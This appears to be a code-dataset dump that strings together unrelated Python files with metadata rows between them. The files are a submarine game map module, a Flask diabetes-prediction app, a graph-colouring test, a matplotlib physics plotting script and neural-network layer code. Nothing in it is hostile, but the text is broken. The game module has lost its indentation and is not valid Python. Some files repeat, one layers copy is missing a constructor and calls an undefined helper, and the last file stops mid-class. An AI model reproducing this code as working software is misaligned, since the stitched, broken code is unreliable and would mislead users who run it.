def _to_dict(self):
return {
"treasure": list(self.treasure),
"attributes": dict(self.attributes),
"explored": list(self.explored)
}
def cell_tick(self):
if "deposit" in self.attributes and random.random() < 0.015:
self.treasure.append("plating")
if "diverse" in self.attributes and random.random() < 0.015:
self.treasure.append("specimen")
if "ruins" in self.attributes and random.random() < 0.015:
self.treasure.append(random.choice(["tool", "circuitry"]))
if random.random() < 0.01:
self.explored.clear()
def treasure_string(self) -> str:
return list_to_and_separated(list(map(lambda t: t.title(), self.treasure)))
def square_status(self) -> str:
return f"This square has treasures {self.treasure_string()} and attributes {self.attributes}."
def pick_up(self, power: int) -> List[str]:
power = min(power, len(self.treasure))
treasures = []
for _ in range(power):
treas = random.choice(self.treasure)
self.treasure.remove(treas)
treasures.append(treas)
return treasures
def bury_treasure(self, treasure: str) -> bool:
self.treasure.append(treasure)
return True
def unbury_treasure(self, treasure: str) -> bool:
if treasure in self.treasure:
index = self.treasure.index(treasure)
del self.treasure[index]
return True
return False
def name(self, to_show: Collection[str] = ("d", "a", "m", "e", "j")) -> Optional[str]:
if "name" in self.attributes:
name = string.capwords(self.attributes["name"], " ")
if name != "":
return name
to_check = {"d": "docking", "a": "ruins", "m": "deposit", "e": "diverse", "j": "junk"}
for attr in to_check:
if attr in to_show and to_check[attr] in self.attributes:
name = self.attributes[to_check[attr]].title()
if name != "":
return name
return None
def outward_broadcast(self, strength: int) -> str:
# This is what the sub sees when scanning this cell.
suffix = ""
if "hiddenness" in self.attributes:
if self._hidden(strength):
return ""
suffix = " (was hidden)"
broadcast = []
if self.attributes.get("weather", "normal") == "stormy":
broadcast.append("a storm brewing")
if len(self.treasure) > 0:
if strength > 2:
broadcast.append(self.treasure_string())
else:
plural = ""
if len(self.treasure) != 1:
plural = "s"
broadcast.append(f"{len(self.treasure)} treasure{plural}")
if "diverse" in self.attributes:
broadcast.append("a diverse ecosystem")
if "ruins" in self.attributes:
broadcast.append("some ruins")
if "junk" in self.attributes:
broadcast.append("some submarine debris")
if "deposit" in self.attributes:
broadcast.append("a mineral deposit")
if "docking" in self.attributes:
broadcast.append("a docking station")
prefix = "An unnamed square, containing: "
square_name = self.name()
if square_name is not None:
prefix = f"An square named {square_name}, containing: "
if len(broadcast) > 0:
return f"{prefix}{list_to_and_separated(broadcast)}{suffix}"
return ""
# We can't type check this because it would cause a circular import.
def on_entry(self, sub) -> Tuple[str, bool]:
# This is what happens when a sub attempts to enter this space.
# This includes docking and damage.
if "docking" in self.attributes:
sub.movement.set_direction(reverse_dir[sub.movement.get_direction()])
sub.power.activate(False)
(x, y) = sub.movement.get_position()
return f"Docked at **{self.attributes['docking'].title()}** at position ({x}, {y})! The power has been stopped. Please call !exit_sub to leave the submarine and enter the docking station.", False
if "obstacle" in self.attributes:
sub.damage(1)
sub.movement.set_direction(reverse_dir[sub.movement.get_direction()])
return f"The submarine hit a wall and took one damage!", True
return "", False
def can_npc_enter(self) -> bool:
return not ("docking" in self.attributes or "obstacle" in self.attributes)
def to_char(self, to_show: List[str], show_hidden: bool = False,
perspective: Optional[Collection[str]] = None) -> str:
if show_hidden or not self._hidden(0, perspective):
if "t" in to_show and len(self.treasure) > 0:
return "T"
if "a" in to_show and "ruins" in self.attributes:
return "A"
if "j" in to_show and "junk" in self.attributes:
return "J"
if "m" in to_show and "deposit" in self.attributes:
return "M"
if "e" in to_show and "diverse" in self.attributes:
return "E"
if "w" in to_show and "obstacle" in self.attributes:
if "wallstyle" in self.attributes and self.attributes['wallstyle'] in WALL_STYLES:
return self.attributes['wallstyle']
else:
return "W"
if "d" in to_show and "docking" in self.attributes:
return "D"
if "s" in to_show and "weather" in self.attributes:
return WEATHER.get(self.attributes.get("weather", "normal"), ".")
return "."
def map_name(self, to_show: List[str], show_hidden: bool = False,
perspective: Optional[Collection[str]] = None) -> Optional[str]:
# For Thomas' map drawing code.
# Gives names to squares that make sense.
treasure = ""
if not show_hidden and self._hidden(0, perspective):
return ""
if "t" in to_show and len(self.treasure) > 0:
treasure = self.treasure_string()
name = self.name(to_show)
if name is not None:
if treasure != "":
return f"{name} (with treasure {treasure})"
return name
if treasure != "":
return f"has {treasure}"
return None
def docked_at(self) -> Optional[str]:
# Returns its name if it's a docking station, else None
if "docking" in self.attributes:
return self.attributes["docking"].title()
return None
def difficulty(self) -> int:
difficulties = {"storm": 8, "rough": 6, "normal": 4, "calm": 2}
modifier = 1 if "ruins" in self.attributes else 0
return difficulties.get(self.attributes.get('weather', "normal"), 4) + modifier
def has_been_scanned(self, subname: str, strength: int) -> None:
if not self._hidden(strength):
self.explored.add(subname)
def _hidden(self, strength: int, ships: Optional[Collection[str]] = None) -> bool:
if ships and not self.explored.isdisjoint(ships):
return False
else:
return "hiddenness" in self.attributes and self.attributes["hiddenness"] > strength
def add_attribute(self, attr: str, val="") -> bool:
if attr not in ATTRIBUTES:
return False
validator = self.VALIDATORS.get(attr, NopValidator())
clean = validator(val)
if clean is None:
return False
if attr not in self.attributes or self.attributes[attr] != clean:
self.attributes[attr] = clean
self.explored.clear()
return True
return False
def remove_attribute(self, attr: str) -> bool:
if attr in self.attributes:
del self.attributes[attr]
self.explored.clear()
return True
return False
undersea_map = [[Cell() for _ in range(Y_LIMIT)] for _ in range(X_LIMIT)]
def in_world(x: int, y: int) -> bool:
return 0 <= x < X_LIMIT and 0 <= y < Y_LIMIT
def possible_directions() -> List[str]:
return list(directions.keys())
def get_square(x: int, y: int) -> Optional[Cell]:
if in_world(x, y):
return undersea_map[x][y]
return None
def bury_treasure_at(name: str, pos: Tuple[int, int]) -> bool:
(x, y) = pos
if in_world(x, y):
return undersea_map[x][y].bury_treasure(name)
return False
def unbury_treasure_at(name: str, pos: Tuple[int, int]) -> bool:
(x, y) = pos
if in_world(x, y):
return undersea_map[x][y].unbury_treasure(name)
return False
def pick_up_treasure(pos: Tuple[int, int], power: int) -> List[str]:
(x, y) = pos
if in_world(x, y):
return undersea_map[x][y].pick_up(power)
return []
def map_tick():
for x in range(X_LIMIT):
for y in range(Y_LIMIT):
undersea_map[x][y].cell_tick()
def map_to_dict() -> Dict[str, Any]:
    """
    Serialize the map to a plain dict: every cell via its _to_dict(), plus
    the map dimensions so map_from_dict can rebuild the grid exactly.
    """
    cell_dicts: List[List[Dict[str, Any]]] = [
        [undersea_map[x][y]._to_dict() for y in range(Y_LIMIT)]
        for x in range(X_LIMIT)
    ]
    return {"map": cell_dicts, "x_limit": X_LIMIT, "y_limit": Y_LIMIT}
def map_from_dict(dictionary: Dict[str, Any]):
    """
    Overwrite the module's map (and its X_LIMIT / Y_LIMIT dimensions) with
    the grid serialized by map_to_dict, recreating each cell via Cell._from_dict.
    """
    global X_LIMIT, Y_LIMIT, undersea_map
    X_LIMIT = dictionary["x_limit"]
    Y_LIMIT = dictionary["y_limit"]
    cell_rows = dictionary["map"]
    undersea_map = [
        [Cell._from_dict(cell_rows[x][y]) for y in range(Y_LIMIT)]
        for x in range(X_LIMIT)
    ]
| 9,001 | 988 | 184 |
e0c510106ef78198473f06da95d40e884b02a014 | 1,961 | py | Python | webapp/app.py | fcalderonnearsoft/Workshop-ML | 3e45ffbd36f1fd54f2f2bb51bf9bce13ecff23ea | [
"MIT"
] | null | null | null | webapp/app.py | fcalderonnearsoft/Workshop-ML | 3e45ffbd36f1fd54f2f2bb51bf9bce13ecff23ea | [
"MIT"
] | null | null | null | webapp/app.py | fcalderonnearsoft/Workshop-ML | 3e45ffbd36f1fd54f2f2bb51bf9bce13ecff23ea | [
"MIT"
] | null | null | null | from flask import Flask, render_template, request
from wtforms import Form, TextAreaField, validators
import os
import pickle
app = Flask(__name__)
######## Preparing the Predictor
cur_dir = os.path.dirname(__file__)
clf = pickle.load(open(os.path.join(cur_dir,'pkl_objects/diabetes.pkl'), 'rb'))
@app.route('/')
@app.route('/results', methods=['POST'])
if __name__ == '__main__':
app.run(debug=True)
#
#
#2,108,64,30.37974684,156.05084746,30.8,0.158,21
| 33.237288 | 153 | 0.587455 | from flask import Flask, render_template, request
from wtforms import Form, TextAreaField, validators
import os
import pickle
app = Flask(__name__)
######## Preparing the Predictor
cur_dir = os.path.dirname(__file__)
clf = pickle.load(open(os.path.join(cur_dir,'pkl_objects/diabetes.pkl'), 'rb'))
def classify(document):
    """Map a comma-separated feature string to a 'positive'/'negative' label via the loaded model."""
    label = {0: 'negative', 1: 'positive'}
    print ("==========================================")
    print (document)
    print ("==========================================")
    features = [float(field) for field in document.split(',')]
    outcome = clf.predict([features])[0]
    return label[outcome]
class ReviewForm(Form):
    # Single free-text field rendered by the form templates.
    # NOTE(review): the name 'moviereview' is presumably left over from the
    # movie-review tutorial this app was adapted from; confirm the templates
    # use the same name before renaming.
    moviereview = TextAreaField('',
                                [validators.DataRequired(),
                                validators.length(min=15)])
@app.route('/')
def index():
    """Render the empty input form."""
    return render_template('reviewform.html', form=ReviewForm(request.form))
@app.route('/results', methods=['POST'])
def results():
    """Join the submitted form fields into a feature string, classify it, and show the result."""
    form = ReviewForm(request.form)
    if request.method == 'POST':
        # Field order matters: it must match the feature order the model
        # was trained on.
        field_names = ('number_of_pregnacies', 'glucose', 'blood_pressure',
                       'thickness', 'insulin', 'body_mass_index',
                       'diabetes_pedigree', 'age')
        test = ",".join(request.form[name] for name in field_names)
        y = classify(test)
        return render_template('results.html',
                               content=test,
                               prediction=y)
    return render_template('reviewform.html', form=form)
if __name__ == '__main__':
    # Development server only -- Flask's debug mode must not stay enabled in
    # a production deployment.
    app.run(debug=True)
#
#
#2,108,64,30.37974684,156.05084746,30.8,0.158,21
| 1,235 | 158 | 90 |
92e9a81f33bc75b1870d7a82ff76972027a6c214 | 485 | py | Python | graph/graph_coloring_tests/test_big_file.py | DariaMinieieva/sudoku_project | acfe6b6ff4e0343ad0dae597e783f9da40a7faee | [
"MIT"
] | 5 | 2021-05-27T09:26:30.000Z | 2021-05-28T10:33:46.000Z | graph/graph_coloring_tests/test_big_file.py | DariaMinieieva/sudoku_project | acfe6b6ff4e0343ad0dae597e783f9da40a7faee | [
"MIT"
] | null | null | null | graph/graph_coloring_tests/test_big_file.py | DariaMinieieva/sudoku_project | acfe6b6ff4e0343ad0dae597e783f9da40a7faee | [
"MIT"
] | 1 | 2021-05-28T08:43:05.000Z | 2021-05-28T08:43:05.000Z | """Module to test graph with maximum size that supports coloring algorithm."""
import sys
import os
from time import time
sys.path.append(os.getcwd())
from graph.graph_coloring import Graph
# Build the graph from the largest fixture the coloring algorithm supports.
graph = Graph()
graph.create_graph_from_file('graph/graph_coloring_tests/max_size_graph.txt')
# Time only the coloring itself, not the file parsing.
start = time()
colored_vertices = graph.color_graph(995)
end = time()
# NOTE(review): range(1, 995) yields 994 expected entries while color_graph
# is asked for 995 colors -- confirm this off-by-one is intentional.
expected = [f'V{num}:{num}' for num in range(1, 995)]
print(expected == colored_vertices)
print('Time taken: ', end - start)
| 23.095238 | 78 | 0.752577 | """Module to test graph with maximum size that supports coloring algorithm."""
import sys
import os
from time import time
sys.path.append(os.getcwd())
from graph.graph_coloring import Graph
# Build the graph from the largest fixture the coloring algorithm supports.
graph = Graph()
graph.create_graph_from_file('graph/graph_coloring_tests/max_size_graph.txt')
# Time only the coloring itself, not the file parsing.
start = time()
colored_vertices = graph.color_graph(995)
end = time()
# NOTE(review): range(1, 995) yields 994 expected entries while color_graph
# is asked for 995 colors -- confirm this off-by-one is intentional.
expected = [f'V{num}:{num}' for num in range(1, 995)]
print(expected == colored_vertices)
print('Time taken: ', end - start)
| 0 | 0 | 0 |
871c6f314ff69142514f2c265c9c846749999e69 | 9,791 | py | Python | figures/EOM/EOM-CoM.py | novarios/Thesis | 55feaec71ec2de255c6df52df5229ddaca10790a | [
"MIT"
] | null | null | null | figures/EOM/EOM-CoM.py | novarios/Thesis | 55feaec71ec2de255c6df52df5229ddaca10790a | [
"MIT"
] | null | null | null | figures/EOM/EOM-CoM.py | novarios/Thesis | 55feaec71ec2de255c6df52df5229ddaca10790a | [
"MIT"
] | null | null | null | import sys
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.ticker import MultipleLocator
from matplotlib import gridspec
from mpl_toolkits.axes_grid.inset_locator import inset_axes

# Input data files: particle-attached (PA) and particle-removed (PR) EOM runs.
FILENAME_PA = '/home/sam/Documents/thesis/data/PA_EOM_COM.dat'
FILENAME_PR = '/home/sam/Documents/thesis/data/PR_EOM_COM.dat'

# Shared per-nucleus styling: one (linestyle, marker, color) triple per data set.
LINESTYLES = ('-', '--', ':', '-.')
MARKERS = ('o', 's', '^', 'v')
COLORS = ('k', 'r', 'b', 'g')
PA_LABELS = (r'$\mathrm{{}^{17}O(5/2^{+})}$', r'$\mathrm{{}^{17}F(5/2^{+})}$',
             r'$\mathrm{{}^{23}O(1/2^{+})}$', r'$\mathrm{{}^{23}F(5/2^{+})}$')
PR_LABELS = (r'$\mathrm{{}^{15}N(1/2^{-})}$', r'$\mathrm{{}^{15}O(1/2^{-})}$',
             r'$\mathrm{{}^{21}N(1/2^{-})}$', r'$\mathrm{{}^{21}O(5/2^{+})}$')

HW_LABEL = r'$\mathrm{\hbar\omega\ (MeV)}$'
HWT_LABEL = r'$\mathrm{\hbar\widetilde{\omega}\ (MeV)}$'
ECM_LABEL = r'$\mathrm{E_{cm}(\omega)\ (MeV)}$'
ECMT_LABEL = r'$\mathrm{E_{cm}(\widetilde{\omega})\ (MeV)}$'


def parse_com_file(path):
    """Parse one E_cm data file into four data sets (one per nucleus).

    File layout (fixed by the generating code):
      * lines 0-23: four blocks of six lines; column 0 is hbar-omega and
        column 6 the ground-state E_cm  -> keys 'hw0' / 'e0'.
      * lines 24-71: four blocks of twelve lines, read as consecutive pairs;
        the pair member with the smaller E_cm (column 7) supplies
        hbar-omega (column 0 -> 'hw1'), E_cm (column 7 -> 'e1') and the
        optimised hbar-omega-tilde (column 1 -> 'hwa').

    Returns a list of four dicts keyed 'hw0', 'e0', 'hw1', 'e1', 'hwa'.
    """
    with open(path) as handle:
        lines = handle.read().split('\n')
    sets = [{'hw0': [], 'e0': [], 'hw1': [], 'e1': [], 'hwa': []}
            for _ in range(4)]
    for num, raw in enumerate(lines):
        if num < 24:
            cols = raw.split()
            data = sets[num // 6]
            data['hw0'].append(float(cols[0]))
            data['e0'].append(float(cols[6]))
        # The upper bound also guards against reading past the end of the
        # file (the original read lines[num + 1] unconditionally and could
        # raise IndexError on a trailing newline).
        elif num < 72 and num % 2 == 0:
            cols = raw.split()
            pair = lines[num + 1].split()
            best = cols if float(cols[7]) < float(pair[7]) else pair
            data = sets[(num - 24) // 12]
            data['hw1'].append(float(best[0]))
            data['e1'].append(float(best[7]))
            data['hwa'].append(float(best[1]))
    return sets


def _plot_four(sets, xkey, ykey, labels):
    """Plot one styled curve per data set on the current axes."""
    for data, style, mark, color, label in zip(sets, LINESTYLES, MARKERS,
                                               COLORS, labels):
        plt.plot(data[xkey], data[ykey], style, marker=mark, color=color,
                 linewidth=2.0, label=label)


def _draw_inset(host_ax, sets, note_upper, note_lower):
    """Inset comparing hbar-omega with the optimal hbar-omega-tilde for sets 0 and 2."""
    inset_axes(host_ax, width="50%", height=1.5, loc=1)
    plt.plot(sets[0]['hw0'], sets[0]['hwa'], '-', marker='o', color='r',
             linewidth=2.0)
    plt.plot(sets[2]['hw0'], sets[2]['hwa'], '-.', marker='v', color='b',
             linewidth=2.0)
    plt.xlabel(HW_LABEL, fontsize=14)
    plt.ylabel(HWT_LABEL, fontsize=14)
    plt.annotate(note_upper, fontsize=12, xy=(0.25, 0.75),
                 xycoords='axes fraction')
    plt.annotate(note_lower, fontsize=12, xy=(0.50, 0.25),
                 xycoords='axes fraction')


pa_sets = parse_com_file(FILENAME_PA)
pr_sets = parse_com_file(FILENAME_PR)

# Diagnostic dump of the particle-attached data (kept from the original script).
for data in pa_sets:
    print(data['e0'])
    print(data['hw0'])
    print(data['e1'])
    print(data['hw1'])
    print(data['hwa'])

plt.rc('font', family='serif')
fig = plt.figure(figsize=(11, 10))
gs = gridspec.GridSpec(2, 2)

# Top left: PA ground-state E_cm versus oscillator frequency.
ax1 = plt.subplot(gs[0])
_plot_four(pa_sets, 'hw0', 'e0', PA_LABELS)
plt.axis([6.0, 30.0, -0.5, 9.0])
plt.setp(ax1.get_xticklabels(), visible=False)
ax1.set_ylabel(ECM_LABEL, fontsize=15)
ax1.legend(bbox_to_anchor=(0.325, 0.975), frameon=False, fontsize=11)

# Top right: PA E_cm at the optimised frequency, with the omega-tilde inset.
ax2 = plt.subplot(gs[1])
_plot_four(pa_sets, 'hw1', 'e1', PA_LABELS)
plt.axis([6.0, 30.0, 0.0, 1.0])
plt.setp(ax2.get_xticklabels(), visible=False)
ax2.set_ylabel(ECMT_LABEL, fontsize=15)
_draw_inset(ax2, pa_sets, r'$\mathrm{^{17}O,^{17}F}$',
            r'$\mathrm{^{23}O,^{23}F}$')
ax2.legend(bbox_to_anchor=(0.325, 0.975), frameon=False, fontsize=11)

# Bottom left: PR ground-state E_cm.
ax3 = plt.subplot(gs[2])
_plot_four(pr_sets, 'hw0', 'e0', PR_LABELS)
plt.axis([6.0, 30.0, -0.5, 10.0])
ax3.set_xlabel(HW_LABEL, fontsize=15)
ax3.set_ylabel(ECM_LABEL, fontsize=15)
ax3.legend(bbox_to_anchor=(0.325, 0.975), frameon=False, fontsize=11)

# Bottom right: PR E_cm at the optimised frequency, with its inset.
ax4 = plt.subplot(gs[3])
_plot_four(pr_sets, 'hw1', 'e1', PR_LABELS)
plt.axis([6.0, 30.0, -0.1, 1.0])
ax4.set_xlabel(HW_LABEL, fontsize=15)
ax4.set_ylabel(ECMT_LABEL, fontsize=15)
_draw_inset(ax4, pr_sets, r'$\mathrm{^{15}N,^{15}O}$',
            r'$\mathrm{^{21}N,^{21}O}$')
ax4.legend(bbox_to_anchor=(0.325, 0.975), frameon=False, fontsize=11)

plt.tight_layout()
plt.savefig('EOM-CoM.pdf', format='pdf', bbox_inches='tight')
plt.show()
| 33.416382 | 104 | 0.563885 | import sys
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.ticker import MultipleLocator
from matplotlib import gridspec
from mpl_toolkits.axes_grid.inset_locator import inset_axes

# Input data files: particle-attached (PA) and particle-removed (PR) EOM runs.
FILENAME_PA = '/home/sam/Documents/thesis/data/PA_EOM_COM.dat'
FILENAME_PR = '/home/sam/Documents/thesis/data/PR_EOM_COM.dat'

# Shared per-nucleus styling: one (linestyle, marker, color) triple per data set.
LINESTYLES = ('-', '--', ':', '-.')
MARKERS = ('o', 's', '^', 'v')
COLORS = ('k', 'r', 'b', 'g')
PA_LABELS = (r'$\mathrm{{}^{17}O(5/2^{+})}$', r'$\mathrm{{}^{17}F(5/2^{+})}$',
             r'$\mathrm{{}^{23}O(1/2^{+})}$', r'$\mathrm{{}^{23}F(5/2^{+})}$')
PR_LABELS = (r'$\mathrm{{}^{15}N(1/2^{-})}$', r'$\mathrm{{}^{15}O(1/2^{-})}$',
             r'$\mathrm{{}^{21}N(1/2^{-})}$', r'$\mathrm{{}^{21}O(5/2^{+})}$')

HW_LABEL = r'$\mathrm{\hbar\omega\ (MeV)}$'
HWT_LABEL = r'$\mathrm{\hbar\widetilde{\omega}\ (MeV)}$'
ECM_LABEL = r'$\mathrm{E_{cm}(\omega)\ (MeV)}$'
ECMT_LABEL = r'$\mathrm{E_{cm}(\widetilde{\omega})\ (MeV)}$'


def parse_com_file(path):
    """Parse one E_cm data file into four data sets (one per nucleus).

    File layout (fixed by the generating code):
      * lines 0-23: four blocks of six lines; column 0 is hbar-omega and
        column 6 the ground-state E_cm  -> keys 'hw0' / 'e0'.
      * lines 24-71: four blocks of twelve lines, read as consecutive pairs;
        the pair member with the smaller E_cm (column 7) supplies
        hbar-omega (column 0 -> 'hw1'), E_cm (column 7 -> 'e1') and the
        optimised hbar-omega-tilde (column 1 -> 'hwa').

    Returns a list of four dicts keyed 'hw0', 'e0', 'hw1', 'e1', 'hwa'.
    """
    with open(path) as handle:
        lines = handle.read().split('\n')
    sets = [{'hw0': [], 'e0': [], 'hw1': [], 'e1': [], 'hwa': []}
            for _ in range(4)]
    for num, raw in enumerate(lines):
        if num < 24:
            cols = raw.split()
            data = sets[num // 6]
            data['hw0'].append(float(cols[0]))
            data['e0'].append(float(cols[6]))
        # The upper bound also guards against reading past the end of the
        # file (the original read lines[num + 1] unconditionally and could
        # raise IndexError on a trailing newline).
        elif num < 72 and num % 2 == 0:
            cols = raw.split()
            pair = lines[num + 1].split()
            best = cols if float(cols[7]) < float(pair[7]) else pair
            data = sets[(num - 24) // 12]
            data['hw1'].append(float(best[0]))
            data['e1'].append(float(best[7]))
            data['hwa'].append(float(best[1]))
    return sets


def _plot_four(sets, xkey, ykey, labels):
    """Plot one styled curve per data set on the current axes."""
    for data, style, mark, color, label in zip(sets, LINESTYLES, MARKERS,
                                               COLORS, labels):
        plt.plot(data[xkey], data[ykey], style, marker=mark, color=color,
                 linewidth=2.0, label=label)


def _draw_inset(host_ax, sets, note_upper, note_lower):
    """Inset comparing hbar-omega with the optimal hbar-omega-tilde for sets 0 and 2."""
    inset_axes(host_ax, width="50%", height=1.5, loc=1)
    plt.plot(sets[0]['hw0'], sets[0]['hwa'], '-', marker='o', color='r',
             linewidth=2.0)
    plt.plot(sets[2]['hw0'], sets[2]['hwa'], '-.', marker='v', color='b',
             linewidth=2.0)
    plt.xlabel(HW_LABEL, fontsize=14)
    plt.ylabel(HWT_LABEL, fontsize=14)
    plt.annotate(note_upper, fontsize=12, xy=(0.25, 0.75),
                 xycoords='axes fraction')
    plt.annotate(note_lower, fontsize=12, xy=(0.50, 0.25),
                 xycoords='axes fraction')


pa_sets = parse_com_file(FILENAME_PA)
pr_sets = parse_com_file(FILENAME_PR)

# Diagnostic dump of the particle-attached data (kept from the original script).
for data in pa_sets:
    print(data['e0'])
    print(data['hw0'])
    print(data['e1'])
    print(data['hw1'])
    print(data['hwa'])

plt.rc('font', family='serif')
fig = plt.figure(figsize=(11, 10))
gs = gridspec.GridSpec(2, 2)

# Top left: PA ground-state E_cm versus oscillator frequency.
ax1 = plt.subplot(gs[0])
_plot_four(pa_sets, 'hw0', 'e0', PA_LABELS)
plt.axis([6.0, 30.0, -0.5, 9.0])
plt.setp(ax1.get_xticklabels(), visible=False)
ax1.set_ylabel(ECM_LABEL, fontsize=15)
ax1.legend(bbox_to_anchor=(0.325, 0.975), frameon=False, fontsize=11)

# Top right: PA E_cm at the optimised frequency, with the omega-tilde inset.
ax2 = plt.subplot(gs[1])
_plot_four(pa_sets, 'hw1', 'e1', PA_LABELS)
plt.axis([6.0, 30.0, 0.0, 1.0])
plt.setp(ax2.get_xticklabels(), visible=False)
ax2.set_ylabel(ECMT_LABEL, fontsize=15)
_draw_inset(ax2, pa_sets, r'$\mathrm{^{17}O,^{17}F}$',
            r'$\mathrm{^{23}O,^{23}F}$')
ax2.legend(bbox_to_anchor=(0.325, 0.975), frameon=False, fontsize=11)

# Bottom left: PR ground-state E_cm.
ax3 = plt.subplot(gs[2])
_plot_four(pr_sets, 'hw0', 'e0', PR_LABELS)
plt.axis([6.0, 30.0, -0.5, 10.0])
ax3.set_xlabel(HW_LABEL, fontsize=15)
ax3.set_ylabel(ECM_LABEL, fontsize=15)
ax3.legend(bbox_to_anchor=(0.325, 0.975), frameon=False, fontsize=11)

# Bottom right: PR E_cm at the optimised frequency, with its inset.
ax4 = plt.subplot(gs[3])
_plot_four(pr_sets, 'hw1', 'e1', PR_LABELS)
plt.axis([6.0, 30.0, -0.1, 1.0])
ax4.set_xlabel(HW_LABEL, fontsize=15)
ax4.set_ylabel(ECMT_LABEL, fontsize=15)
_draw_inset(ax4, pr_sets, r'$\mathrm{^{15}N,^{15}O}$',
            r'$\mathrm{^{21}N,^{21}O}$')
ax4.legend(bbox_to_anchor=(0.325, 0.975), frameon=False, fontsize=11)

plt.tight_layout()
plt.savefig('EOM-CoM.pdf', format='pdf', bbox_inches='tight')
plt.show()
| 0 | 0 | 0 |
40fe5bd1f5ac1196ee4058078bdcb72613172419 | 388 | py | Python | exercicios/PycharmProjects/exepython/ex042.py | Ojhowribeiro/PythonProjects | a058c0e090a7b96714bbd942c5c03664e4f3744f | [
"MIT"
] | null | null | null | exercicios/PycharmProjects/exepython/ex042.py | Ojhowribeiro/PythonProjects | a058c0e090a7b96714bbd942c5c03664e4f3744f | [
"MIT"
] | null | null | null | exercicios/PycharmProjects/exepython/ex042.py | Ojhowribeiro/PythonProjects | a058c0e090a7b96714bbd942c5c03664e4f3744f | [
"MIT"
] | null | null | null | r1 = float(input('Primeiro segmento: '))
r2 = float(input('segundo segmento: '))
r3 = float(input('terceiro segmento: '))
# Triangle inequality: each side must be shorter than the sum of the others.
if r1 < r2 + r3 and r2 < r1 + r3 and r3 < r1 + r2:
    print('É um triangulo:')
    # Classify: all sides equal -> equilateral; all different -> scalene;
    # otherwise exactly two equal -> isosceles.
    if r1 == r2 == r3:
        print('Equilatero!')
    elif r1 != r2 != r3 != r1:
        print('Escaleno!')
    else:
        print('Isosceles!')
else:
print('Nao é um triangulo') | 27.714286 | 50 | 0.556701 | r1 = float(input('Primeiro segmento: '))
r2 = float(input('segundo segmento: '))
r3 = float(input('terceiro segmento: '))
# Triangle inequality: each side must be shorter than the sum of the others.
if r1 < r2 + r3 and r2 < r1 + r3 and r3 < r1 + r2:
    print('É um triangulo:')
    # Classify: all sides equal -> equilateral; all different -> scalene;
    # otherwise exactly two equal -> isosceles.
    if r1 == r2 == r3:
        print('Equilatero!')
    elif r1 != r2 != r3 != r1:
        print('Escaleno!')
    else:
        print('Isosceles!')
else:
print('Nao é um triangulo') | 0 | 0 | 0 |
781de0ee0a125c78df965d3af5495763cc850f0a | 5,227 | py | Python | assignments/assignment2/layers.py | NadyaStrogankova/dlcourse_ai | d03e3123b9f801fa3d801ab08e7327df5d48be43 | [
"MIT"
] | null | null | null | assignments/assignment2/layers.py | NadyaStrogankova/dlcourse_ai | d03e3123b9f801fa3d801ab08e7327df5d48be43 | [
"MIT"
] | null | null | null | assignments/assignment2/layers.py | NadyaStrogankova/dlcourse_ai | d03e3123b9f801fa3d801ab08e7327df5d48be43 | [
"MIT"
] | null | null | null | import numpy as np
def l2_regularization(W, reg_strength):
    """
    L2 regularization loss on the weights and its gradient.

    Arguments:
      W, np array - weights
      reg_strength, float - regularization coefficient

    Returns:
      loss, single value - reg_strength * sum(W ** 2)
      gradient, np array shaped like W - 2 * reg_strength * W
    """
    penalty = reg_strength * np.sum(np.square(W))
    d_penalty = (2 * reg_strength) * W
    return penalty, d_penalty
def softmax_with_cross_entropy(predictions, target_index):
    """
    Softmax + cross-entropy loss and its gradient w.r.t. the predictions.

    Arguments:
      predictions, np array, shape (N) or (batch_size, N) - classifier output
      target_index, np array of int, shape (1) or (batch_size) - index of the
        true class for each sample

    Returns:
      loss, single value - mean cross-entropy loss
      np array shaped like predictions - gradient of the loss
    """
    probs = softmax(predictions)
    one_hot, hit = targets(target_index, predictions.shape)
    # Cross-entropy: mean negative log-probability of the true class.
    loss = np.mean(-np.log(probs[hit]))
    # d(loss)/d(predictions) = (softmax - one_hot) / batch_size.
    grad = (probs - one_hot) / probs.shape[0]
    return loss, grad.reshape(predictions.shape)
class Param:
    """
    Trainable parameter of the model
    Captures both parameter value and the gradient
    """
    # NOTE(review): only the docstring survives in this copy -- the __init__
    # that sets .value and .grad appears to have been stripped; confirm
    # against the complete version of layers.py.
def softmax(predictions):
    '''
    Turn raw scores into probabilities in [0, 1] that sum to one per sample.

    Arguments:
      predictions, np array, shape (N) or (batch_size, N) - classifier output

    Returns:
      np array of the same shape with one probability per class.
    '''
    # Subtracting the per-sample maximum keeps exp() from overflowing while
    # leaving the result mathematically unchanged.
    if predictions.ndim > 1:
        shifted = predictions.T - predictions.max(axis=1)
        exps = np.exp(shifted)
        return (exps / exps.sum(axis=0)).T
    shifted = predictions - np.max(predictions)
    exps = np.exp(shifted)
    return np.array(exps / sum(exps))
| 30.213873 | 109 | 0.619476 | import numpy as np
def l2_regularization(W, reg_strength):
    """
    L2 regularization loss on the weights and its gradient.

    Arguments:
      W, np array - weights
      reg_strength, float - regularization coefficient

    Returns:
      loss, single value - reg_strength * sum(W ** 2)
      gradient, np array shaped like W - 2 * reg_strength * W
    """
    penalty = reg_strength * np.sum(np.square(W))
    d_penalty = (2 * reg_strength) * W
    return penalty, d_penalty
def softmax_with_cross_entropy(predictions, target_index):
    """
    Softmax + cross-entropy loss and its gradient w.r.t. the predictions.

    Arguments:
      predictions, np array, shape (N) or (batch_size, N) - classifier output
      target_index, np array of int, shape (1) or (batch_size) - index of the
        true class for each sample

    Returns:
      loss, single value - mean cross-entropy loss
      np array shaped like predictions - gradient of the loss
    """
    probs = softmax(predictions)
    one_hot, hit = targets(target_index, predictions.shape)
    # Cross-entropy: mean negative log-probability of the true class.
    loss = np.mean(-np.log(probs[hit]))
    # d(loss)/d(predictions) = (softmax - one_hot) / batch_size.
    grad = (probs - one_hot) / probs.shape[0]
    return loss, grad.reshape(predictions.shape)
class Param:
    """
    Trainable parameter of the model
    Captures both parameter value and the gradient
    """
    def __init__(self, value):
        # Current parameter value (expected to be a numpy array).
        self.value = value
        # Gradient buffer with the same shape as value, zero-initialized.
        self.grad = np.zeros_like(value)
class ReLULayer:
    """ReLU activation layer: forward is element-wise max(x, 0); backward
    passes gradients through only where the input was positive."""

    def __init__(self):
        # Boolean mask of positions where the last forward input was
        # strictly positive; filled by forward(), used by backward().
        self._positive = None

    def forward(self, X):
        """Apply element-wise ReLU and remember which inputs were positive.

        Arguments:
          X, np array (batch_size, num_features) - layer input

        Returns:
          np array of the same shape with negatives clamped to zero.
        """
        self._positive = X > 0
        return np.maximum(X, 0)

